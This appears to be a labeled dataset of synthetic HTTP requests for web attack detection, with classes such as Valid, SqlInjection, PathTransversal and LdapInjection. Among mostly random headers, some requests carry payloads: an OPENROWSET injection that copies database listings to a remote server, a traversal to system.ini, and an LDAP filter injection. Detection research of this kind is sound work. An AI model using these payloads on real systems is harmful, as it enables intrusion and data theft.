GET /aiSWqL0UKz_dtBR/jrlsQFyqZjk/rajiodnt3kctutfoR/TB0iP/tn4_.O8xmDG0@Z6D.ym0/iUEB-4eMdZ8dQ2TctVrR/n3NRvgj4rhP/hGZdSN8rY/ty8stiniaeht.cgi?wimldtgwsfethf=099&HHstyle.uA=e%25H3lvar2ad%3Cbj3a&nobq=tIsdQ4ddksj8l&onysg=699&Lned7i0oesE=004871&ocaqe7yy9edH=2&aoa=%3A%2BAcontr&hq=3420 HTTP/1.0
Host: 156.12.61.149
Connection: close
Accept: text/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip
Accept-Language: *
Cache-Control: max-stale=26
Client-ip: 245.83.65.213
Cookie: 1xtaf=tRN1QSX0vS5r;ess1omeif=ncrhohLjZ;hXdDO=9504992;yaeresilhxn=rNvFxrjs;igo=0;Asd41LWbinR=;like:O
Cookie2: $Version="56"
Date: Thu, 18 Aug 05 08:26:24 CET
ETag: "3Yi_O@QR-K95d5f5x0m"
Expect: pratrasa=nUn4nr
From: dhQcsxrm@7ttnM.org
If-Modified-Since: Wed, 31 Aug 05 19:54:51 GMT
If-Unmodified-Since: Sun, 16 Aug 09 03:52:03 CET
If-Match: "GW3rBDsyH.7IvYb@SM"
If-None-Match: *
If-Range: Mon, 29 Dec 08 12:06:17 CET
Max-Forwards: 1
MIME-Version: 3.8
Pragma: h=dahyynpF
Proxy-Authorization: Digest algorithm=rfff
Authorization: NTLM ZGlkb1N0aGVEb2ZhZWRyZWVuc3hlTmU5ZmloaXdhYWNoaDJ1dGlC
Range: -708348,-278258
Referer: /ter7/iistnac.doc
TE: chunked
Trailer: From
User-Agent: nh7rutlw
UA-CPU: PowerPC
UA-Disp: 2081,300,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: 0.7 www.Hdtl.gif:91087, 8.8 43.3.56.154
Transfer-Encoding: identity
Upgrade: ssIo/9.2
Warning: 024 www.tc2e.jpg:11233 "btieehdprxtrsee" 
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 10330
Start - Id: 45712
class: PathTransversal
GET /WX9BQUYmIidG/y4qI7a_wa_B0xFdA/geoikj/d6snasuesi2Md/gV..UG1pUJ6tZAnc@S/m4A.2TgHLT7CZhB09./aM1sXu2zEi56T8QmMz1I/nX/qC2hRJNGs7g2RS2XVC/eNCXOHbWG8DWntge/9DrNkDZcm/LuCl3qNC.exe?iTaerslirf=2242898&hnNhCl=1531&sddu=592995690&1eajtois5lc=51224709&rkartrwoeiem=kotn&iltS=diret&dtpdgr4efc=%24V+oiCargfsuP&dsasslbfiiaNtde=oe+&R81kf=h%24diecgfszw8nsn&eSqh=evDE1ur0lt&rtfS6=456&ilsnDtpmgad=..........................WINNTsystem.ini&kDt=netcatd&md=aeea4 HTTP/1.1
Host: 83.183.20.187:2
Connection: eaaaf
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: deflate;q=0.4, identity
Accept-Language: *
Cache-Control: Visfe=iosuUe
Client-ip: 244.124.85.82
Cookie: daddT=t\huoor;intrnsiorr5=mtirhtaccesob)ne;N6ehaniieaetl=ieew;h6hctrdEethcuyn=ormeoiodz6ui;Z6ui3rLO5Yt=%;h3ea=nEo tEs7Ril&lccand6t
Cookie2: $Version="0"
Date: Thu, 19 Apr 07 22:50:47 UTC
ETag: "W2cyccIkLZi2-vmxGbfE"
Expect: 100-continue
From: gAo4ot1@1soairea.gov
If-Modified-Since: Thu, 10 Nov 05 18:55:36 UTC
If-Unmodified-Since: Tue, 22 May 07 05:53:57 CET
If-Match: "_O2__yriN3AkuCtSwCg"
If-None-Match: "Sryf3TrOn4Yq.m5K"
If-Range: "yAiKVCoL_cUrrhszV"
Max-Forwards: 2070
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic bmxoZW46TmJ4c2FP
Range: 20-
Referer: http://www.slltn.com/2se8nbee/fost/aA583l/semts.mdb
TE: trailers,chunked;q=0.3,trailers
Trailer: Cache-Control
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 1.9; os-re; rv:7.3.1) Gecko/48305712
UA-CPU: x86
UA-Disp: 8763,047,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 967x7308
Via: FTP/1.3 www.sfprl.css, 2.9 19.72.15.220, 7.2 www.ioih.gif
Transfer-Encoding: 0tlo
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 139.27.168.135
X-Serial-Number: 1618317
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45712
Start - Id: 25221
class: Valid
GET /gWTIpGfsJL5EPm/hX911INz77ix8QJaIb/pwaeyWiEdEl/wKpshcgRnMrm58.asmx?bnenlsihDy=oJxA%40&mee=denuoGapr8teJ&bfaa1ga1osf9h=exbh&idibmia=16667&LroI=9dchildri7+Ro8cEaji%5Dana&os3eaaioqeeNena=e&ssHqgS=71&bAmze5En=1kPE54ZEOLE&sfJoqJcat0dx=3n&rDamoroo=%26usLallcOaeo%265i%27OEse HTTP/1.1
Host: www.trlydeb.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 188.84.7.22
Cookie: 9shw=pTe1c;lco20aei=595;e6H=]t;eehznb=35177036;rG-GLmTxZ=3537413
Cookie2: $Version="7"
Date: Tue, 09 Sep 08 22:48:21 UTC
ETag: W/"9@I4d6_H7UPz_6.aVxtR"
Expect: Eieo7sz
From: k4NgNry@tf92Cos.be
If-Modified-Since: Tue, 04 Dec 07 16:53:47 GMT
If-Unmodified-Since: Mon, 25 Apr 05 06:57:44 CET
If-Match: "bF4RxVnguYuhaVJp-N"
If-None-Match: "EdZsGS.lG-COp@T51pMR"
If-Range: Tue, 07 Mar 06 07:46:47 CET
Max-Forwards: 1
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Basic aHdoc2E6aHQzaVJ2RQ==
Authorization: rthm icdu=lp1Ayatd
Range: -18637,7-
Referer: http://www.ghaE.org/oaedi.gif
TE: trailers
Trailer: From
User-Agent: t5toredrosfrouaedSd
UA-CPU: x86
UA-Disp: 468,067,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 386x0963
Via: aqeisE/6.7 224.216.230.219
Transfer-Encoding: identity
Upgrade: rrtpr/5.4
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 223.126.236.126
X-Serial-Number: 39906730696975900354
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25221
Start - Id: 26080
class: Valid
GET /hCpAUlA/-gNe7group byCSlMF223/mJ4m/PoFVFhE@_TcO.html?ile=hl9iz&ouOuozlto=1438434&aai5ieuzlwind=rJQD6W566&pnnnjprr=04536753&ae=8r%3Dei&nlekaoE2aeeei=csljuinh0wy0mI&iecwSmnainjhsv=ts&wdtSvtsujng=594&ryel=9%29k&a5uhiii=65 HTTP/1.0
Host: www.yAmzoCnon.uk
Connection: pktt
Accept: application/*, audio/*
Accept-Charset: us-ascii, iso-8859-3, euc-jp;q=0.5, cp-950, us-ascii
Accept-Encoding: compress, compress;q=0.9, deflate, gzip, deflate;q=0.5
Accept-Language: o-ytt, daeu-mhGmllo, r0pYs-n420, ohex9e-2mh;q=0.3, N-st;q=0.5
Cache-Control: max-stale=3
Client-ip: 104.91.44.192
Cookie: sioRyebjwin=03487999;9Eodusqenkmius=21;rcytKWai5esPids=07083
Cookie2: $Version="409"
Date: Sun, 17 Sep 06 11:49:37 UTC
ETag: W/"lc.HWafmi@6sQmMRq"
Expect: Emueor
From: etnehlm@T8emrntb.be
If-Modified-Since: Sat, 23 Jun 07 23:53:44 CET
If-Unmodified-Since: Mon, 29 May 06 19:33:32 GMT
If-Match: "QinohytBYqjRHGHxZpmf"
If-None-Match: *
If-Range: Mon, 30 Nov 09 11:04:01 CET
Max-Forwards: 3037
MIME-Version: 9.3
Pragma: wai=tq
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: s9ata aaorh=do8dwA
Range: 7282-,650-7357
Referer: /eeOr8tsh/oefeo.cfm
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: ltree1tt (dk8mJGRKj; nziMe_Snt; pBI9VfA; cQMPK6tQn)
UA-CPU: MIPS
UA-Disp: 5226,2357,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 096x0326
Via: e2he/1.7 159.241.37.180, ouitE8/8.4 www.9roe.html
Transfer-Encoding: deflate
Upgrade: haa/5.6, myonaa/2.5, aqteer/9.9, eigla/3.2, eeKt/1.9
Warning: 585 13.99.155.61:63 "cectngree" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 2954941169740591
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26080
Start - Id: 13301
class: Valid
GET /ie/exteefrja/dmoNyaota.js? HTTP/1.0
Host: www.iAneQ.com
Connection: keep-alive
Accept: text/xml;q=0.2, text/*;q=0.2
Accept-Charset: euc-tw;q=0.2
Accept-Encoding: 
Accept-Language: bntsctte-hi9LEnrt, rw-mimpzs;q=0.3, 2lbavee-n;q=0.1, a4w-seauiomi
Cache-Control: only-if-cached
Client-ip: 111.166.166.251
Cookie: 9xFoZYM0URA=y(h;ufynresgeunso=7rwa|;ivnnnez=aiiu0Etsverts
Cookie2: $Version="04"
Date: Wed, 21 Sep 05 01:45:31 CET
ETag: W/"2a10JwxUEbJ0o0pe"
Expect: 100-continue
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Tue, 12 Jan 10 08:11:38 GMT
If-Unmodified-Since: Mon, 07 Feb 05 13:29:36 CET
If-Match: *
If-None-Match: "WWzWs6.qn5gN7gp96"
If-Range: Wed, 26 Nov 08 02:44:56 GMT
Max-Forwards: 4875
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM eXI4aG90dHQ3cDRzTm4xYW9ub3ljaGFzbzB0c2t0OWVFdVRPZWU=
Authorization: NTLM b2V6ZWFldGNpdG1Wcmluc2xkaW1keGxlRHJhbmUzSXMwZXhm
Range: 0-,-7
Referer: /bE6eeeml/Wte3.js
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: Zte5 (4ngAaRPO; eMzKuH; omfGSei)
UA-CPU: Sparc
UA-Disp: 5979,9503,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: 8.3 www.annlea.htm:721
Transfer-Encoding: compress
Upgrade: b0t/3.8, aods/6.0, si1/3.6
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 152.52.206.24
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13301
Start - Id: 41870
class: SqlInjection
GET /eefGpQGrKIWU3r_rIVu/asfgoat8.png?tnniekw4aerd=49&ontsathemuee0=%3B+++++insert++into+++OPENROWSET%28++++%27SQLoledb%27%2C%27uid%3DidaItiHshn%3Bpwd%3D1iithatr8%3BNetwork%3DDBMSSOCN%3BAddress%3D80.85.37.180%2C1433%3B%27%2C%27select++*+from++++_sysdatabases%27++++%29%3B++select++++*+++from+++LinkedOrRemoteSrv1.master.dbo.sysdatabases&qcrerBut1r=5952&tgeti6hr=wM7d6QZ HTTP/1.0
Host: 27.26.48.234
Connection: u0th
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: vw-i94lpss3;q=0.4, rez-Tf;q=0.6, jias5c-9fhpels
Cache-Control: no-transform
Client-ip: 174.237.136.128
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="776"
Date: Sun, 20 Aug 06 05:23:28 GMT
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: estmtade=iia9d
From: alubns@ssude.cz
If-Modified-Since: Sat, 02 Jan 10 24:30:58 UTC
If-Unmodified-Since: Fri, 08 Feb 08 01:48:16 CET
If-Match: "la9iVkyTPT8pprU3THiD"
If-None-Match: *
If-Range: Fri, 08 Jun 07 06:59:16 CET
Max-Forwards: 16
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: hruhs OR2omeK=eaefp
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: /dsxM.msf
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Unmodified-Since
User-Agent: tilels/5.5
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: 2.6 28.142.120.233, HTTP/5.7 www.8esE.html, FTP/7.0 www.tneef.htm:47165
Transfer-Encoding: sfmai
Upgrade: prc/4.5, 2sFe/0.3
Warning: 392 113.130.15.37 "8vRtmnhtkaGbbhnilg" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41870
Start - Id: 33777
class: Valid
POST /alogopen5EGVU7JQ/noaliehsusnoTaer/rIhem/eQySrByl.png? HTTP/1.0
Content-Length: 88
Content-Language: 7bft
Content-Encoding: identity
Content-Location: /E80veven/oew6ahd/dResr/Iuk7Usam.jsp
Content-MD5: aW4xcnRzdHJwdGFjUm9zYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 05 Jan 10 04:41:16 GMT
Last-Modified: Sat, 06 Sep 08 22:42:38 UTC
Host: www.vcaro.it:80
Connection: heizoNt0
Accept: text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 8hndec-oo5fb;q=0.0, zwdestr-qHota, aMjnnu-rteoe
Cache-Control: no-store
Client-ip: 74.16.238.51
Cookie: rngaI5hpga5nat=5516342573
Cookie2: $Version="7"
Date: Tue, 17 Feb 09 15:48:22 GMT
ETag: W/"pO_@8EIcLHeEwG5"
Expect: 100-continue
From: hoHei@sTshLltba.st
If-Modified-Since: Tue, 28 Dec 04 09:38:24 UTC
If-Unmodified-Since: Sat, 31 Oct 09 04:15:02 UTC
If-Match: *
If-None-Match: "8kO66Ykf-9yiSy@V"
If-Range: Wed, 23 Mar 05 04:24:49 UTC
Max-Forwards: 61
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: dnar oricoou=Orhtma
Authorization: Basic aURvczpndGk5bGo=
Range: 26855-,847-,-23
Referer: http://www.ohdeIsru.de/qriU.swf
TE: gzip;q=0.6
Trailer: If-Unmodified-Since
User-Agent: oGSETUWU8 http://www.lhoJav.de
UA-CPU: StrongARM
UA-Disp: 2862,4299,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 402x308
Via: 4.7 www.fS3eEez.tiff
Transfer-Encoding: deflate
Upgrade: afdtp/0.2, msesl/6.4
Warning: 813 217.129.214.222 "datp" 
X-Forwarded-For: 146.218.100.181
X-Serial-Number: 425658
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r1ntTerk=riteo&moTnDsgyhesLosH=en&hiTeFat5srrme=nlofdcatAtftwhereIi&ptqr=jssi&RelmJo=eDw

End - Id: 33777
Start - Id: 24538
class: Valid
GET /icGi-zHY@Bgw5z7Ho/L6uIe/rira3w3ng/9o/fchildf66.js?hseht0raoftj0=yuallikee%3Ale-bvhn&HSzhNVc=36180&ieure29lso=56661&er=execnGoau%7E4%24seC&oyrwooesis=tfaHPk82Ewp8&fmdeudltrnwrt=fa%3F&JDsgM_IxtermG1=rqRqw&zPGB=ma3Hw.F&T1ul9e=20.ERfDP1N HTTP/1.0
Host: www.60b6ta.gov
Connection: stju
Accept: */*
Accept-Charset: iso-8859-5, x-mac-arabic, big5, x-mac-chinesetrad, x-mac-korean;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 218.219.114.119
Cookie: hfnn=22;roi=265166
Cookie2: $Version="2"
Date: Wed, 29 Apr 09 21:20:36 CET
ETag: "._ul5xhRjdHnXZPTXn"
Expect: fohhaql
From: leyen9ll@dgyc.uk
If-Modified-Since: Mon, 08 Jun 09 18:41:51 GMT
If-Unmodified-Since: Tue, 24 Jun 08 11:29:59 UTC
If-Match: *
If-None-Match: "vqwm7t8TfWkkv72cCk"
If-Range: Thu, 28 Dec 06 13:28:44 UTC
Max-Forwards: 6
MIME-Version: 1.2
Pragma: ul=doeep
Proxy-Authorization: oser ouj1qmso=rgfwv
Authorization: Basic aHRvZWRjOmNlaGdhaQ==
Range: -001651,-8
Referer: /tiaxoWtn/te1nC/hnihow/horetntn/1Lh9.pdf
TE: trailers,chunked;q=0.2
Trailer: If-Modified-Since
User-Agent: qttw/0.9.4.5.8
UA-CPU: Sparc
UA-Disp: 1408,616,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 303x667
Via: 5.5 www.gir0p.jpg:848
Transfer-Encoding: compress
Upgrade: prsuot/9.5, stt/6.8
Warning: 900 74.109.202.46:6 "oanoeaj2nll" "Sat, 13 Jan 07 24:32:28 GMT"
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 185732331097779
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24538
Start - Id: 33514
class: Valid
POST /u4BiCG_Dja-T94/Imu7c/ng-V-ZObxb/efidfitlobDow/eIyFC-/JSLpassthrujEWRLoL/nMfd3iDd/r1dze/hBHwppq/NgGTD-vEo/nyofaomtseo/Ri.tiff? HTTP/1.1
Content-Length: 317
Content-Language: gnuae,rdaf1hu
Content-Encoding: compress
Content-Location: http://www.Naaetd9m.fr/7ec0/eesMrt/eUyhi5/ikRjra.js
Content-MD5: aHMzZWxpeXRsVHJsYWM0Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 24 Feb 05 05:59:20 UTC
Last-Modified: Sun, 16 Sep 07 09:17:00 GMT
Host: 57.221.47.227:80
Connection: TIamSals
Accept: image/gif;q=0.6, image/*;q=0.5
Accept-Charset: koi8, x-mac-roman, utf-8;q=0.5
Accept-Encoding: deflate;q=0.0, identity;q=0.3, identity;q=0.5, gzip;q=0.6
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 168.231.168.33
Cookie: mT=snun7seioedh73;yth=68860744;tn9=ajKlYr;aouEsato=d0dskE9nmvarr %lib;llaiui=svlTahtyge5tntri
Cookie2: $Version="87"
Date: Wed, 25 Mar 09 12:12:49 CET
ETag: W/"@ZM88zyp0XJFioX"
Expect: srrhDnn
From: Towr@gduxvle.gov
If-Modified-Since: Fri, 08 Oct 04 09:21:10 CET
If-Unmodified-Since: Wed, 05 May 10 16:43:59 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 06 Mar 06 12:14:39 GMT
Max-Forwards: 7
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic QVRheXQ4c206RWVkc2VvaA==
Authorization: Basic Z3RwZW15OnBldGFvaA==
Range: 90185-
Referer: /Turf.mspx
TE: gzip,trailers
Trailer: Expect
User-Agent: T9sv0lV/3.0.0.5.4
UA-Disp: 9881,7058,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 565x3425
Via: FTP/1.1 60.85.63.232
Transfer-Encoding: deflate
Upgrade: gfr/9.0, vlr/1.0, ty5ayo/3.2
Warning: 344 209.207.43.31 "nPnbnehOlrEVtersHx" 
X-Serial-Number: 06516057
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eedrtieo4r0=n3etimg&6lryehp9ES5txhT=ysEa&e2akc8TeMrqhrte=ypspcoeekpthEt58ef&ehghneim5el57a=uhk7oiyihttpEu&7tttemom6=psgoopLuxHh w&esesth4qeefeasi=aInP&sohe=bRR1dgZTpcc&agroe4nIpo8os=15944148&oo=37762603&8tt=eiAs&doseAatisup=ldfm ?iframels&2eA67iniornah=15497445&6itne=ashmfom9a4loa&vlrW2qYunsl=diut&Ocsvpydqhqcrye=o

End - Id: 33514
Start - Id: 41390
class: SqlInjection
POST /evcUPnI3y064lE/u@Ohttpsev3dpS6S/oheeskyt/ftplV2a9chlEoee/ifgoeuelueqiYtoEac/CQ1-BFdq/yylU16hIMpY/xivj7kIfvxrq.6iMsA.swf? HTTP/1.0
Content-Length: 151
Content-Language: r2bt
Content-Encoding: compress
Content-Location: http://www.5pfwq.st/ahnknmp.php3
Content-MD5: ZXpobjhoaG9uZGhzdFM3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 17 May 07 23:39:17 UTC
Last-Modified: Thu, 03 Feb 05 20:45:59 GMT
Host: www.eNnoblat.biz
Connection: Huleboa
Accept: audio/*;q=0.6, audio/basic
Accept-Charset: windows-1258;q=0.5, iso-8859-4;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=6
Client-ip: 65.244.212.38
Cookie: Esrdul3Tndynd=hndn3g8t8nnyt;ay=rp&msY]ey;tyhmtwsp=Er1xterm'Aeu s] e ;eet51esu3d8x=61156;omncEeteet=o7ruie
Cookie2: $Version="98"
Date: Thu, 18 Nov 04 06:47:15 CET
ETag: "lIiRlIPKte_9Hpgpj"
Expect: Ezwosie
From: eoiypoA@6niCt.fr
If-Modified-Since: Sun, 11 Sep 05 03:08:01 UTC
If-Unmodified-Since: Mon, 31 Mar 08 15:25:14 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 01 Jul 09 10:14:43 UTC
Max-Forwards: 6
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Basic dGhlYml5YzpubnVVTHAw
Range: 711-
Referer: /shs4r/detpsra/5ahs0/bJtahe.cgi
TE: chunked;q=0.2
Trailer: Upgrade
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 5.5; da-yW; rv:0.8.5) Gecko/89053271
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: 5.3 190.124.190.99
Transfer-Encoding: identity
Upgrade: i0t/1.0, giat/1.3
Warning: 978 www.aeers.png "pstsl2qua0E" "Sat, 06 Mar 10 21:32:52 GMT"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

trdne='  OR 'dioa'   =  N'  &nmgasetro2=qwindow.open0w+&siAaah=~&s7deletetgzsamgchildwdJ=7etaHog<veeA&elun=&wh4execni8a8&ftnsrnlsrA=t

End - Id: 41390
Start - Id: 37626
class: LdapInjection
PUT /9j_7v46Y_sxn2vi/ttacoc/a87dsNggjooixA/sVcAk-/b5esEdstoitloob/r2djHy1uBl7BhDsO5s/nzOI/eJmGsJ.jsp? HTTP/1.0
Content-Length: 201
Content-Language: HsrnimvP,lh,yrt2eCh
Content-Encoding: compress
Content-Location: http://www.04tibr.it/Eutt/aqMA.asmx
Content-MD5: OG5yaG5kMWVHZWFucmF0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Aug 04 12:48:37 GMT
Last-Modified: Mon, 05 Dec 05 03:36:10 CET
Host: 78.239.71.137
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: im0d8isphn=602658394;7i7tLihfkbci=gq0rier;eeisrAOi77z3a=eti;5fqk9egloukhnmb=e9evoo2&h;etRaela9t2phmt=45
Cookie2: $Version="0"
Date: Thu, 31 Jan 08 19:21:40 UTC
ETag: "KfxfT3tTG8FqR3r5"
Expect: 100-continue
From: eVgdo@tlh3.net
If-Modified-Since: Fri, 01 Jul 05 04:32:49 UTC
If-Unmodified-Since: Sat, 24 Dec 05 03:52:41 CET
If-Match: "bhbbKh8reMkrOEpvhI3q"
If-None-Match: "5FSjhDuT7b2BQUdJ"
If-Range: Sat, 22 May 04 11:16:44 GMT
Max-Forwards: 2034
MIME-Version: 4.3
Pragma: ta5='Esntprns'
Proxy-Authorization: Digest username="pitaah"
Authorization: Basic QWFvZzptUmFwZGk=
Range: -6153,297-,439-473
Referer: /7daotgoc.nsf
TE: trailers,chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: asl7 (sB9OF@ect; 1nHj71nln; agtEcKJyq; aETNIdNoSe; 8o4o1U)
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: tl3too/3.6 106.230.232.152:85087, 2.3 www.2cieDnuE.htm, or54/8.0 www.AR6wvni.js
Transfer-Encoding: oEPy; hdhpOon=uupo
Upgrade: nsfs/4.3, or0/9.6, oinu/4.5, e0liay/6.5, MeFp/8.4
Warning: 290 www.csV7.jpg "alupzEldm3wn" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

l4ii=479&Enrees4ebe4lhk=3954)(&(objectClass=wti)(|(sn= bnn)(cn=s   J*))&u7oouqnvcoenta=aponoeYupdates&FPsNmrqQ=documentcugfnazt&iyo=unvfnph->oinputwteE&G3CEbH._N=vL3oYI9

End - Id: 37626
Start - Id: 18914
class: Valid
GET /zKRDHmUJcerVsD/zwiokNiy/tTejD7LqifnCuFqcO/BvRgw/gz_TYl.t-c86s/ozmlCMF0yCDirs.jpg? HTTP/1.0
Host: www.erodhd.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-korean;q=0.0, windows-1251;q=0.8, x-mac-greek;q=0.2, hz-gb-2312;q=0.3
Accept-Encoding: deflate;q=0.5, identity, deflate;q=0.1, gzip;q=0.1
Accept-Language: eheeiM-oHrw;q=0.3, ioy-hsG;q=0.9, hIeisa-afquid;q=0.1, mehm-so
Cache-Control: ktr4cei='ee5'
Client-ip: 166.177.25.206
Cookie: vIQeVL=izaldsss2c517tr;sPU6XOv0A5Ys=23791716
Cookie2: $Version="0"
Date: Thu, 27 Nov 08 02:43:43 GMT
ETag: "HBxiEPbrzHOsoQpTJI"
Expect: leet=odiaciA;rke1x
From: yjsS@orU9r.uk
If-Modified-Since: Sat, 09 Dec 06 04:11:07 CET
If-Unmodified-Since: Fri, 16 Sep 05 20:49:54 GMT
If-Match: *
If-None-Match: "xP2Ogq1WPNqI2sd"
If-Range: Sat, 29 Oct 05 10:37:15 GMT
Max-Forwards: 476
MIME-Version: 2.2
Pragma: aifeueg='fnc'
Proxy-Authorization: Digest nonce
Authorization: NTLM ZGNwQ2VlZWFhYWU5OXQ3dXJmbnVlZW9lblRwdGVyZW5oZ290U29kZTZmZXN1
Range: 3104-33,76-
Referer: /eiesDl2h.wmn
TE: trailers,chunked
Trailer: Expect
User-Agent: tuq3s/2.6.7.9
UA-CPU: Sparc
UA-Disp: 7305,2751,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 905x897
Via: HTTP/0.8 76.203.153.103
Transfer-Encoding: identity
Upgrade: eRaba/1.6, mmqn2/8.0, cwzoea/3.0
Warning: 540 37.121.159.48 "2sfimA" 
X-Forwarded-For: 197.169.87.183
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18914
Start - Id: 8896
class: Valid
GET /1txEGVAAShlcQ/var4bC3/sGvDr/oLt0hi9enrwsino/nj/lhlXXN2JDfhcFy.jpeg?0hetugoddxd=1961325895&6XFV9acceptU=tFUpSulZ&lt22S0ktht0=scriptdS&v4oxqeteHhei=froms HTTP/1.1
Host: 54.219.78.234
Connection: keep-alive
Accept: image/gif;q=0.7, image/*;q=0.8, audio/*;q=0.9
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: dae=n
Client-ip: 30.198.149.185
Cookie: h2wReasbe1eawS5=iTaXhOic>oobf
Cookie2: $Version="3"
Date: Sat, 02 Aug 08 03:50:36 UTC
ETag: "PYa2ikkc@WaZ0Sl"
Expect: 100-continue
From: gyture4e@b1eUnPsa.de
If-Modified-Since: Wed, 06 Jun 07 19:04:32 GMT
If-Unmodified-Since: Tue, 16 May 06 12:58:00 UTC
If-Match: "mYnDiLwmFnwEgQQsf4k0"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic aXlla3RsOmdlZW1y
Authorization: NTLM Y2V1aHJuZWF0dDR1ZWV4dHRkaWpBbURzbW1odGlLb3phaW1qMXNneWxoMkVzWmVh
Range: 326-7
Referer: /aqmi/ddtsg4/clbia2ot/ee9a/oO14rHt.swf
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: 2ruoztt (w8g8Wp; fBCqnN)
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 000x5970
Via: 4.9 218.146.29.220, 3.3 www.ghnbtp4f.html, FTP/5.6 www.buotagty.shtml
Transfer-Encoding: smude; ooia0n=otqtebwh
Upgrade: ne7b/6.5
Warning: 706 www.aaueje4a.jpeg "nuadttallasneoesa" 
X-Forwarded-For: 219.111.245.62
X-Serial-Number: 266699
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 8896
Start - Id: 39805
class: SSI
